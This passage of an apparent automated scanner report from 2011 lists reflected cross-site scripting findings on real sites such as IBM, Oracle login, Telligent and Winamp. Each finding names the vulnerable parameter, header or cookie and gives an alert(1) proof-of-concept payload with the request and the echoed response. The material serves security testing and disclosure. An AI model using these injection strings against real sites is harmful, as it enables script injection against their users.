HTTP/1.1 200 OK Date: Sat, 26 Feb 2011 23:30:08 GMT Server: IBM_HTTP_Server Expires: Thu, 01 Dec 1994 16:00:00 GMT Cache-Control: no-cache="set-cookie, set-cookie2" Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Content-Language: en-US Set-Cookie: JSESSIONID=0000E Content-Length: 67320 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <a href="/webapp/iwm/web ...[SNIP]... |
3.71. https://www14.software.ibm.com/webapp/iwm/web/signup.do [cm parameter] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | https://www14.software |
Path: | /webapp/iwm/web/signup.do |
Issue detail
The value of the cm request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5090c"><script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /webapp/iwm/web/signup.do Host: www14.software.ibm.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response
HTTP/1.1 200 OK Date: Sat, 26 Feb 2011 23:30:00 GMT Server: IBM_HTTP_Server Expires: Thu, 01 Dec 1994 16:00:00 GMT Cache-Control: no-cache="set-cookie, set-cookie2" Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Content-Language: en-US Set-Cookie: JSESSIONID=0000gO8IZ Content-Length: 67320 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <a href="/webapp/iwm/web ...[SNIP]... |
3.72. https://www14.software.ibm.com/webapp/iwm/web/signup.do [cmp parameter] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | https://www14.software |
Path: | /webapp/iwm/web/signup.do |
Issue detail
The value of the cmp request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8ba58"><script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /webapp/iwm/web/signup.do Host: www14.software.ibm.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response
HTTP/1.1 200 OK Date: Sat, 26 Feb 2011 23:30:10 GMT Server: IBM_HTTP_Server Expires: Thu, 01 Dec 1994 16:00:00 GMT Cache-Control: no-cache="set-cookie, set-cookie2" Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Content-Language: en-US Set-Cookie: JSESSIONID=0000iq7tv Content-Length: 67320 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <a href="/webapp/iwm/web ...[SNIP]... |
3.73. https://www14.software.ibm.com/webapp/iwm/web/signup.do [cr parameter] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | https://www14.software |
Path: | /webapp/iwm/web/signup.do |
Issue detail
The value of the cr request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1af2a"><script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /webapp/iwm/web/signup.do Host: www14.software.ibm.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response
HTTP/1.1 200 OK Date: Sat, 26 Feb 2011 23:30:02 GMT Server: IBM_HTTP_Server Expires: Thu, 01 Dec 1994 16:00:00 GMT Cache-Control: no-cache="set-cookie, set-cookie2" Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Content-Language: en-US Set-Cookie: JSESSIONID=0000 Content-Length: 67320 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <a href="/webapp/iwm/web ...[SNIP]... |
3.74. https://www14.software.ibm.com/webapp/iwm/web/signup.do [csr parameter] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | https://www14.software |
Path: | /webapp/iwm/web/signup.do |
Issue detail
The value of the csr request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d200c"><script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /webapp/iwm/web/signup.do Host: www14.software.ibm.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response
HTTP/1.1 200 OK Date: Sat, 26 Feb 2011 23:29:58 GMT Server: IBM_HTTP_Server Expires: Thu, 01 Dec 1994 16:00:00 GMT Cache-Control: no-cache="set-cookie, set-cookie2" Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Content-Language: en-US Set-Cookie: JSESSIONID=0000GCArT Content-Length: 67320 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <a href="/webapp/iwm/web ...[SNIP]... |
3.75. https://www14.software.ibm.com/webapp/iwm/web/signup.do [ct parameter] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | https://www14.software |
Path: | /webapp/iwm/web/signup.do |
Issue detail
The value of the ct request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f22e7"><script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /webapp/iwm/web/signup.do Host: www14.software.ibm.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response
HTTP/1.1 200 OK Date: Sat, 26 Feb 2011 23:30:03 GMT Server: IBM_HTTP_Server Expires: Thu, 01 Dec 1994 16:00:00 GMT Cache-Control: no-cache="set-cookie, set-cookie2" Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Content-Language: en-US Set-Cookie: JSESSIONID=0000qQP8L Content-Length: 67320 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <a href="/webapp/iwm/web ...[SNIP]... |
3.76. https://www14.software.ibm.com/webapp/iwm/web/signup.do [mkwid parameter] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | https://www14.software |
Path: | /webapp/iwm/web/signup.do |
Issue detail
The value of the mkwid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fdcaa"><script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /webapp/iwm/web/signup.do Host: www14.software.ibm.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response
HTTP/1.1 200 OK Date: Sat, 26 Feb 2011 23:30:12 GMT Server: IBM_HTTP_Server Expires: Thu, 01 Dec 1994 16:00:00 GMT Cache-Control: no-cache="set-cookie, set-cookie2" Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Content-Language: en-US Set-Cookie: JSESSIONID=0000-1 Content-Length: 67320 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... /iwm/web/signup.do?source ...[SNIP]... |
3.77. https://www14.software.ibm.com/webapp/iwm/web/signup.do [name of an arbitrarily supplied request parameter] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | https://www14.software |
Path: | /webapp/iwm/web/signup.do |
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 439fe"><script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /webapp/iwm/web/signup.do Host: www14.software.ibm.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response
HTTP/1.1 200 OK Date: Sat, 26 Feb 2011 23:30:13 GMT Server: IBM_HTTP_Server Expires: Thu, 01 Dec 1994 16:00:00 GMT Cache-Control: no-cache="set-cookie, set-cookie2" Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Content-Language: en-US Set-Cookie: JSESSIONID=00005jmud Content-Length: 67330 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... iwm/web/signup.do?source ...[SNIP]... |
3.78. https://event.on24.com/eventRegistration/EventLobbyServlet [User-Agent HTTP header] previous next
Summary
Severity: | Low |
Confidence: | Certain |
Host: | https://event.on24.com |
Path: | /eventRegistration |
Issue detail
The value of the User-Agent HTTP header is copied into an HTML comment. The payload d3ae7--><script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /eventRegistration Host: event.on24.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)d3ae7--><script>alert(1)< Connection: close |
Response
HTTP/1.1 200 OK Date: Sat, 26 Feb 2011 23:30:21 GMT Content-Type: text/html; charset=utf-8 Set-Cookie: JSESSIONID=0rvu9xpQX X-Powered-By: Servlet/2.5 JSP/2.1 Connection: close <!-- optional parameters cb : leave blank to hide logo, or pass in appropriate cb value topmargin - default is 20 leftmargin ...[SNIP]... t 100%. useful to restrict content of two column reg page middlecolumn: # of pixels for middle column. default is 4. fyi: your user-agent string is: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)d3ae7--><script>alert(1)< --> ...[SNIP]... |
3.79. https://login.oracle.com/mysso/signon.jsp [Referer HTTP header] previous next
Summary
Severity: | Low |
Confidence: | Certain |
Host: | https://login.oracle.com |
Path: | /mysso/signon.jsp |
Issue detail
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f3f59"><script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /mysso/signon.jsp Host: login.oracle.com Connection: keep-alive Referer: http://www.google.com Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_cc=true; s_nr=1298762800321; gpv_p24=https%3A/ |
Response
HTTP/1.1 200 OK Date: Sat, 26 Feb 2011 23:27:53 GMT Server: Oracle-Application-Server Cache-Control: no-cache Pragma: no-cache Expires: Thu, 29 cfhOct 1969 17:04:19 GMT Connection: close Content-Type: text/html; charset=UTF-8 Set-Cookie: BIGipServerloginadc Content-Length: 8443 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <!--Template file taken from conftest --> <!DOCTYPE HTML PUB ...[SNIP]... <a href="https://myprofile ...[SNIP]... |
3.80. https://login.oracle.com/pls/orasso/orasso.wwsso_app_admin.ls_login [Referer HTTP header] previous next
Summary
Severity: | Low |
Confidence: | Certain |
Host: | https://login.oracle.com |
Path: | /pls/orasso/orasso.wwsso |
Issue detail
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c91e7"><script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /pls/orasso/orasso.wwsso Host: login.oracle.com Connection: keep-alive Referer: http://www.google.com Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_cc=true; s_nr=1298762800321; gpv_p24=https%3A/ |
Response (redirected)
HTTP/1.1 200 OK Date: Sat, 26 Feb 2011 23:27:52 GMT Server: Oracle-Application-Server Cache-Control: no-cache Pragma: no-cache Expires: Thu, 29 cfhOct 1969 17:04:19 GMT Connection: close Content-Type: text/html; charset=UTF-8 Set-Cookie: BIGipServerloginadc Content-Length: 8443 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <!--Template file taken from conftest --> <!DOCTYPE HTML PUB ...[SNIP]... <a href="https://myprofile ...[SNIP]... |
3.81. http://telligent.com/products/request_a_demo.aspx [Referer HTTP header] previous next
Summary
Severity: | Low |
Confidence: | Certain |
Host: | http://telligent.com |
Path: | /products/request_a_demo |
Issue detail
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 20662"><script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /products/request_a_demo Host: telligent.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CSExtendedAnalytics Referer: http://www.google.com |
Response
HTTP/1.1 200 OK Cache-Control: no-cache, no-store Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.0 Telligent-Evolution: 5.5.134.11785 Set-Cookie: CommunityServer X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Sat, 26 Feb 2011 23:21:57 GMT Connection: close Content-Length: 66403 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <input type="hidden" id="referrer" name="referrer" value="http://www.google ...[SNIP]... |
3.82. http://telligent.com/resources/m/analysts/1343205.aspx [Referer HTTP header] previous next
Summary
Severity: | Low |
Confidence: | Certain |
Host: | http://telligent.com |
Path: | /resources/m/analysts |
Issue detail
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 137cc"><script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /resources/m/analysts Host: telligent.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CSExtendedAnalytics Referer: http://www.google.com |
Response
HTTP/1.1 200 OK Cache-Control: no-cache, no-store Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.0 Telligent-Evolution: 5.5.134.11785 Set-Cookie: CommunityServer X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Sat, 26 Feb 2011 23:22:27 GMT Connection: close Content-Length: 64261 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <input type="hidden" id="referrer" name="referrer" value="http://www.google ...[SNIP]... |
3.83. http://telligent.com/resources/m/analysts/1345217.aspx [Referer HTTP header] previous next
Summary
Severity: | Low |
Confidence: | Certain |
Host: | http://telligent.com |
Path: | /resources/m/analysts |
Issue detail
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bbc8d"><script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /resources/m/analysts Host: telligent.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CSExtendedAnalytics Referer: http://www.google.com |
Response
HTTP/1.1 200 OK Cache-Control: no-cache, no-store Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.0 Telligent-Evolution: 5.5.134.11785 Set-Cookie: CommunityServer X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Sat, 26 Feb 2011 23:22:36 GMT Connection: close Content-Length: 64972 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <input type="hidden" id="referrer" name="referrer" value="http://www.google ...[SNIP]... |
3.84. http://telligent.com/resources/m/success_stories/1331597.aspx [Referer HTTP header] previous next
Summary
Severity: | Low |
Confidence: | Certain |
Host: | http://telligent.com |
Path: | /resources/m/success |
Issue detail
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ad044"><script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /resources/m/success Host: telligent.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CSExtendedAnalytics Referer: http://www.google.com |
Response
HTTP/1.1 200 OK Cache-Control: no-cache, no-store Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.0 Telligent-Evolution: 5.5.134.11785 Set-Cookie: CommunityServer X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Sat, 26 Feb 2011 23:22:43 GMT Connection: close Content-Length: 64200 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <input type="hidden" id="referrer" name="referrer" value="http://www.google ...[SNIP]... |
3.85. http://telligent.com/support/request_an_upgrade/ [Referer HTTP header] previous next
Summary
Severity: | Low |
Confidence: | Certain |
Host: | http://telligent.com |
Path: | /support/request_an |
Issue detail
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3cdbf"><script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /support/request_an Host: telligent.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CSExtendedAnalytics Referer: http://www.google.com |
Response
HTTP/1.1 200 OK Cache-Control: no-cache, no-store Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.0 Telligent-Evolution: 5.5.134.11785 Set-Cookie: CommunityServer X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Sat, 26 Feb 2011 23:23:35 GMT Connection: close Content-Length: 61451 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <input type="hidden" id="referrer" name="referrer" value="http://www.google ...[SNIP]... |
3.86. http://www.watchmouse.com/en/ [Referer HTTP header] previous next
Summary
Severity: | Low |
Confidence: | Certain |
Host: | http://www.watchmouse.com |
Path: | /en/ |
Issue detail
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 169d7'-alert(1)-This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /en/ HTTP/1.1 Host: www.watchmouse.com Proxy-Connection: keep-alive Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Referer: http://www.google.com |
Response
HTTP/1.1 200 OK Date: Sun, 27 Feb 2011 01:36:30 GMT Server: Apache/2.2.9 (Debian) X-Powered-By: PHP/5.2.6-1+lenny9 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache ETag: "0-en-aae30c915a39ee Content-Language: en P3P: policyref="/w3c/p3p.xml" Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Content-Length: 18320 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head><tit ...[SNIP]... <![CDATA[ function checkReferrer(){ var vref_string = encodeURIComponent('173 var serverRef = encodeURIComponent('http: if(document && document.referrer){ jsRef = encodeURIComponent ...[SNIP]... |
3.87. http://bs.serving-sys.com/BurstingPipe/adServer.bs [eyeblaster cookie] previous next
Summary
Severity: | Information |
Confidence: | Certain |
Host: | http://bs.serving-sys.com |
Path: | /BurstingPipe/adServer.bs |
Issue detail
The value of the eyeblaster cookie is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 4de67%3balert(1)/This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /BurstingPipe/adServer.bs Host: bs.serving-sys.com Proxy-Connection: keep-alive Referer: http://techcrunch.com/wp Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: C4=; eyeblaster=BWVal=&BWDate= |
Response
HTTP/1.1 200 OK Cache-Control: no-cache, no-store Pragma: no-cache Content-Type: text/html Expires: Sun, 05-Jun-2005 22:00:00 GMT Vary: Accept-Encoding Set-Cookie: eyeblaster=BWVal=&BWDate= Set-Cookie: A3=heSmakII0c9M00001 Set-Cookie: B3=8r8g0000000001tf7 Set-Cookie: u2=3a6c8499-0c84-46b7 P3P: CP="NOI DEVa OUR BUS UNI" Date: Sun, 27 Feb 2011 02:31:24 GMT Connection: close Content-Length: 2143 var ebPtcl="http://";var ebBigS="ds.serving-sys ...[SNIP]... ]/ig,ebRand).replace(/\[ ...[SNIP]... |
3.88. http://seg.sharethis.com/getSegment.php [__stid cookie] previous next
Summary
Severity: | Information |
Confidence: | Certain |
Host: | http://seg.sharethis.com |
Path: | /getSegment.php |
Issue detail
The value of the __stid cookie is copied into the HTML document as plain text between tags. The payload c13e0<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /getSegment.php?fpc Host: seg.sharethis.com Proxy-Connection: keep-alive Referer: http://edge.sharethis.com Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __stid=CszLBk1bK3ITL |
Response
HTTP/1.1 200 OK Server: nginx/0.8.47 Date: Sun, 27 Feb 2011 02:18:22 GMT Content-Type: text/html Connection: keep-alive X-Powered-By: PHP/5.3.3 P3P: "policyref="/w3c/p3p.xml" Content-Length: 1195 <html> <head><title>ShareThis Segmenter</title></head> <body> No Segment <script type="text/javascript"> var ref=document.referrer;var lurl = (("https:" == document.location.p ...[SNIP]... <div style='display:none' userid: </div> ...[SNIP]... |
3.89. http://www.winamp.com/ [countryCookie cookie] previous next
Summary
Severity: | Information |
Confidence: | Certain |
Host: | http://www.winamp.com |
Path: | / |
Issue detail
The value of the countryCookie cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ef6c8"-alert(1)-This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET / HTTP/1.1 Host: www.winamp.com Proxy-Connection: keep-alive Referer: http://forums.winamp.com Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: UNAUTHID=1.f2ed797a4 |
Response
HTTP/1.1 200 OK Date: Sun, 27 Feb 2011 17:45:15 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Content-Length: 71696 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <script type="text/javascript" ...[SNIP]... |
3.90. http://www.winamp.com/media-player/en [countryCookie cookie] previous next
Summary
Severity: | Information |
Confidence: | Certain |
Host: | http://www.winamp.com |
Path: | /media-player/en |
Issue detail
The value of the countryCookie cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ff2bf"-alert(1)-This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /media-player/en HTTP/1.1 Host: www.winamp.com Proxy-Connection: keep-alive Referer: http://forums.winamp.com Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: UNAUTHID=1.f2ed797a4 |
Response
HTTP/1.1 200 OK Date: Sun, 27 Feb 2011 17:44:57 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Content-Length: 46321 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <script type="text/javascript" ...[SNIP]... |
3.91. http://www.winamp.com/skin/slick-redux/222084 [countryCookie cookie] previous next
Summary
Severity: | Information |
Confidence: | Certain |
Host: | http://www.winamp.com |
Path: | /skin/slick-redux/222084 |
Issue detail
The value of the countryCookie cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4db17"-alert(1)-This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
